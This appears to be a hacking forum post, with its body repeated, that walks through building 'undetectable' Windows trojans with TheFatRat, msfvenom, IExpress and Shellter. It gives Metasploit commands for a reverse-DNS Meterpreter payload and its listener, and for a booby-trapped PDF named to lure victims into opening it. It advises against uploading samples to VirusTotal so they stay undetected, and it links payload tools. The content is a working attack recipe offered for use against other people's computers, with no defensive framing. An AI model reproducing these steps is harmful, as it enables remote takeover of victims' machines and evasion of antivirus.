Create Undetectable Payload:
Requirements :
Linux Distrubtion of you choice.
TheFatRat
Metasploit
Fatrat installation.....Installation
Instructions on how to install TheFatRat
Troubleshoot on TheFatRat
chk_tools script to use in case of problems in setup.sh of fatrat this script will check if everything is in the right version to run fatrat and will also provide you a solution for the problem
Tool Overview
Lets Start With Generate Undetectable Payload, Backdoor with MsfVenom
Step 1.Type 1 for create a backdoor with msfvenom.
Step 2.Type 2 for Windows
Step 3.Set LHOST and LPORT.
Step 4. Type 2 for reverse_tcp payload.
Step 5.The Payload file will be saved within the Tools folder under Desktop.
Step 6. go there !
Trick 2
How To Create an Undetectable Trojan Using a Domain Name.
In this tutorial I am going to show you how to create an undetectable Meterpreter Trojan using a Domain name. I have taken a few #its_me_kali and built it into one. The first part is creating the DNS Payload. The second part is creating the Executable file. Part 3 is using both in Shellter to create your undetectable Trojan. Part 4 is setting up your listener using Armitage.
Things You Will Need:
Kali Linux
A No IP account with a domain name
A forwarded port on your router
Shellter (https://www.shellterproject.com)
Part 1: Creating the DNS Payload
Using Kali:
Open Metasploit on Kali by typing msfconsole in a terminal.
Type use payload/windows/meterpreter/reversetcpdns.
Type show options. This will show you that you need to set your lhost and lport.
Type set lhost (hostname you created, without http://).
Type set lport (port you have forwarded on your router set for the Kali machine).
Type generate -h. This will show you the options for generating the payload. You can choose different options but at least do the following.
Type generate -f (file name you choose for the payload) -p windows -t raw. Ex. generate -f DNS -p windows -t raw
Exit the terminal and click on Files. Your payload will be in your Home (Unless you set an option for a different location).
Transfer the created payload to Windows. (Be aware that your AV might detect it at its current state).
Part 2: Creating the Executable File in Windows
Choose option that applies to you. (Important as Shellter does not work with 64-bit executables).
32-bit Windows - Navigate to C:\Windows\System32\iexpress.exe (Right click and select run as administrator)
64-bit Windows - Navigate to C:\Windows\SysWOW64\iexpress.exe (Right click and select run as administrator)#its_me_kali
Choose Create new Self Extraction Directive File and click next.
Click next on the Package Purpose page.
Type the title of the package. (This can be anything you want) Ex: Notepad.exe
No Prompt, click next.
Do not display a license. Click next.
Click Add and choose any file on your computer. I choose Notepad.exe in the C:\Windows\System32 folder. Click Next.
Click the drop arrow and choose the file name you choose on the last screen. Click Next.
Choose Hidden and then click next.
No Message. Click Next
Click Browse and type a name for your malware file and a destination. #its_me_kali
Check the Hide File Extracting Progress Animation from user. Click Next.
Select No restart and then click next.
You can then either choose to save the self extraction directive or don't save. Click Next.
Click Next again on the create Package. Then click Finish
Part 3: Using Both Created Files in Shellter to Create Your Trojan.
Open the folder that Shellter is in.
Right click on Shellter.exe and click Run as Administrator.
Type A for Auto.
Type N for No.
Type the location of your created EXE file from Part 2 and hit enter.
Let Shellter do it's thing for 30 seconds to a minute.
When asked to choose payload, type C for custom.#its_me_kali
Type the location of your created payload in Part 1 and hit enter.
Type N for No reflective DLL loader.
Hit enter and let Shellter finish doing it's thing If it says Injection Verified! you should have a working undetectable Trojan.
Hit enter to exit Shellter.
Part 4: Set Up Your Listener
You can either use Metasploit or Armitage. I prefer Armitage so my tutorial will be for that.
Go back to Kali.
Open Terminal and type Msfupdate
Once it's done type apt-get install armitage.
Type msfdb init
Open Armitage
Click Connect
Click Yes
Once Armitage opens type: use exploit/multi/handler
Type set lhost 0.0.0.0
Type set lport (your port you forwarded in your router)
#its_me_kali
Type set payload windows/meterpreter/reverse tcp dns
Type set exitonsession false
(Optional.) Type set autorunscript migrate -f
(Optional.) Type set prependmigrate True
Type exploit -j
(Optional steps are to migrate the process automatically so the session does not end before you can do it manually)
Now you should be able to run your undetectable Trojan and get a Meterpreter session.
DO NOT Upload your created Executable to online sites such as Virus Total.
Payload Xreation=https://mega.nz/folder/Ug9RFK5Z#nrZTlXMaJippG34v3g-fqA
TRICK 3:
How to Embed a backdoor in a PDF file.
Step 1)Run Metasploit
Step2) Find the Appropriate Exploit.
I will search metasploits database for an exploit for adobe pdf on windows, using this command:
●Code:msf > search type:exploit platform:windows adobe pdf
You should see the exploit "exploit/windows/fileformat/adobe_pdf_embedded_exe", which we will use:
●Code:msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe
Step 3) Set the Payload
I will use the meterpreter payload again, because it is one of the most powerful payloads available to us:
●Code:msf > exploit (adobe_pdf_embedded_exe) > set payload windows/meterpreter/reverse_tcp
Step 4) Set the exploit options
First, display the required options for the exploit:
●Code:msf > exploit (adobe_pdf_embedded_exe) > show options
You can see that we must provide an existing PDF file to the INFILENAME option in which to embed the meterpreter payload. I will call it "hemantexample.pdf":
●Code: msf > exploit (adobe_pdf_embedded_exe) > set INFILENAME example.pdf
The next option is the output file name, FILENAME. Change this to something innocent that will attract users to open it:
msf > exploit (adobe_pdf_embedded_exe) > set FILENAME recipes.pdf
Finally, we need to specify the LHOST, which is our (the attackers) IP address. Mine is 192.168.1.8:
●Code:msf > exploit (adobe_pdf_embedded_exe) > set LHOST 192.168.1.8
Step5) Run the Exploit.
Now that all the options are set, we can run the exploit like this:
●Code: msf > exploit (adobe_pdf_embedded_exe) > exploit
Metasploit has created a PDF named recipes.pdf that contains the Meterpeter listener. Now, simply get users to open the pdf (Social Engineering again), and you will get instant control of their computer easy .
Pixload – Advanced Image Payload Creating Tool
Pixload Is An Advanced Set Of Tools That Allows You To Hide Payloads Within Image Files By Either Creating Or Injecting The Intended Payload Into The Desired Image
Source Link :-
https://github.com/chinarulezzz/pixload
How To Use This Tool :-
kalilinuxtutorials.com
Some other payload creators
github.com
github.com
github.com
github.com
BONUS
Requirements :
Linux Distrubtion of you choice.
TheFatRat
Metasploit
Fatrat installation.....Installation
Instructions on how to install TheFatRat
Troubleshoot on TheFatRat
chk_tools script to use in case of problems in setup.sh of fatrat this script will check if everything is in the right version to run fatrat and will also provide you a solution for the problem
Tool Overview
Lets Start With Generate Undetectable Payload, Backdoor with MsfVenom
Step 1.Type 1 for create a backdoor with msfvenom.
Step 2.Type 2 for Windows
Step 3.Set LHOST and LPORT.
Step 4. Type 2 for reverse_tcp payload.
Step 5.The Payload file will be saved within the Tools folder under Desktop.
Step 6. go there !
Trick 2
How To Create an Undetectable Trojan Using a Domain Name.
In this tutorial I am going to show you how to create an undetectable Meterpreter Trojan using a Domain name. I have taken a few #its_me_kali and built it into one. The first part is creating the DNS Payload. The second part is creating the Executable file. Part 3 is using both in Shellter to create your undetectable Trojan. Part 4 is setting up your listener using Armitage.
Things You Will Need:
Kali Linux
A No IP account with a domain name
A forwarded port on your router
Shellter (https://www.shellterproject.com)
Part 1: Creating the DNS Payload
Using Kali:
Open Metasploit on Kali by typing msfconsole in a terminal.
Type use payload/windows/meterpreter/reversetcpdns.
Type show options. This will show you that you need to set your lhost and lport.
Type set lhost (hostname you created, without http://).
Type set lport (port you have forwarded on your router set for the Kali machine).
Type generate -h. This will show you the options for generating the payload. You can choose different options but at least do the following.
Type generate -f (file name you choose for the payload) -p windows -t raw. Ex. generate -f DNS -p windows -t raw
Exit the terminal and click on Files. Your payload will be in your Home (Unless you set an option for a different location).
Transfer the created payload to Windows. (Be aware that your AV might detect it at its current state).
Part 2: Creating the Executable File in Windows
Choose option that applies to you. (Important as Shellter does not work with 64-bit executables).
32-bit Windows - Navigate to C:\Windows\System32\iexpress.exe (Right click and select run as administrator)
64-bit Windows - Navigate to C:\Windows\SysWOW64\iexpress.exe (Right click and select run as administrator)#its_me_kali
Choose Create new Self Extraction Directive File and click next.
Click next on the Package Purpose page.
Type the title of the package. (This can be anything you want) Ex: Notepad.exe
No Prompt, click next.
Do not display a license. Click next.
Click Add and choose any file on your computer. I choose Notepad.exe in the C:\Windows\System32 folder. Click Next.
Click the drop arrow and choose the file name you choose on the last screen. Click Next.
Choose Hidden and then click next.
No Message. Click Next
Click Browse and type a name for your malware file and a destination. #its_me_kali
Check the Hide File Extracting Progress Animation from user. Click Next.
Select No restart and then click next.
You can then either choose to save the self extraction directive or don't save. Click Next.
Click Next again on the create Package. Then click Finish
Part 3: Using Both Created Files in Shellter to Create Your Trojan.
Open the folder that Shellter is in.
Right click on Shellter.exe and click Run as Administrator.
Type A for Auto.
Type N for No.
Type the location of your created EXE file from Part 2 and hit enter.
Let Shellter do it's thing for 30 seconds to a minute.
When asked to choose payload, type C for custom.#its_me_kali
Type the location of your created payload in Part 1 and hit enter.
Type N for No reflective DLL loader.
Hit enter and let Shellter finish doing it's thing If it says Injection Verified! you should have a working undetectable Trojan.
Hit enter to exit Shellter.
Part 4: Set Up Your Listener
You can either use Metasploit or Armitage. I prefer Armitage so my tutorial will be for that.
Go back to Kali.
Open Terminal and type Msfupdate
Once it's done type apt-get install armitage.
Type msfdb init
Open Armitage
Click Connect
Click Yes
Once Armitage opens type: use exploit/multi/handler
Type set lhost 0.0.0.0
Type set lport (your port you forwarded in your router)
#its_me_kali
Type set payload windows/meterpreter/reverse tcp dns
Type set exitonsession false
(Optional.) Type set autorunscript migrate -f
(Optional.) Type set prependmigrate True
Type exploit -j
(Optional steps are to migrate the process automatically so the session does not end before you can do it manually)
Now you should be able to run your undetectable Trojan and get a Meterpreter session.
DO NOT Upload your created Executable to online sites such as Virus Total.
Payload Xreation=https://mega.nz/folder/Ug9RFK5Z#nrZTlXMaJippG34v3g-fqA
TRICK 3:
How to Embed a backdoor in a PDF file.
Step 1)Run Metasploit
Step2) Find the Appropriate Exploit.
I will search metasploits database for an exploit for adobe pdf on windows, using this command:
●Code:msf > search type:exploit platform:windows adobe pdf
You should see the exploit "exploit/windows/fileformat/adobe_pdf_embedded_exe", which we will use:
●Code:msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe
Step 3) Set the Payload
I will use the meterpreter payload again, because it is one of the most powerful payloads available to us:
●Code:msf > exploit (adobe_pdf_embedded_exe) > set payload windows/meterpreter/reverse_tcp
Step 4) Set the exploit options
First, display the required options for the exploit:
●Code:msf > exploit (adobe_pdf_embedded_exe) > show options
You can see that we must provide an existing PDF file to the INFILENAME option in which to embed the meterpreter payload. I will call it "hemantexample.pdf":
●Code: msf > exploit (adobe_pdf_embedded_exe) > set INFILENAME example.pdf
The next option is the output file name, FILENAME. Change this to something innocent that will attract users to open it:
msf > exploit (adobe_pdf_embedded_exe) > set FILENAME recipes.pdf
Finally, we need to specify the LHOST, which is our (the attackers) IP address. Mine is 192.168.1.8:
●Code:msf > exploit (adobe_pdf_embedded_exe) > set LHOST 192.168.1.8
Step5) Run the Exploit.
Now that all the options are set, we can run the exploit like this:
●Code: msf > exploit (adobe_pdf_embedded_exe) > exploit
Metasploit has created a PDF named recipes.pdf that contains the Meterpeter listener. Now, simply get users to open the pdf (Social Engineering again), and you will get instant control of their computer easy .
Pixload – Advanced Image Payload Creating Tool
Pixload Is An Advanced Set Of Tools That Allows You To Hide Payloads Within Image Files By Either Creating Or Injecting The Intended Payload Into The Desired Image
Source Link :-
https://github.com/chinarulezzz/pixload
How To Use This Tool :-
Pixload : Image Payload Creating/Injecting Tools 2019
Pixload is a set of tools for creating/injecting payload into images. Useful references for better understanding of pixload and its use-cases
kalilinuxtutorials.com
GitHub - g0tmi1k/msfpc: MSFvenom Payload Creator (MSFPC)
MSFvenom Payload Creator (MSFPC). Contribute to g0tmi1k/msfpc development by creating an account on GitHub.
github.com
GitHub - Assassinumz/simple-payload-generator: SPG: Simple MSFVenom Payload Generator
SPG: Simple MSFVenom Payload Generator. Contribute to Assassinumz/simple-payload-generator development by creating an account on GitHub.
github.com
GitHub - arismelachroinos/lscript: The LAZY script will make your life easier, and of course faster.
The LAZY script will make your life easier, and of course faster. - GitHub - arismelachroinos/lscript: The LAZY script will make your life easier, and of course faster.
github.com
chinarulezzz/pixload
Image Payload Creating/Injecting tools. Contribute to chinarulezzz/pixload development by creating an account on GitHub.
github.com
BONUS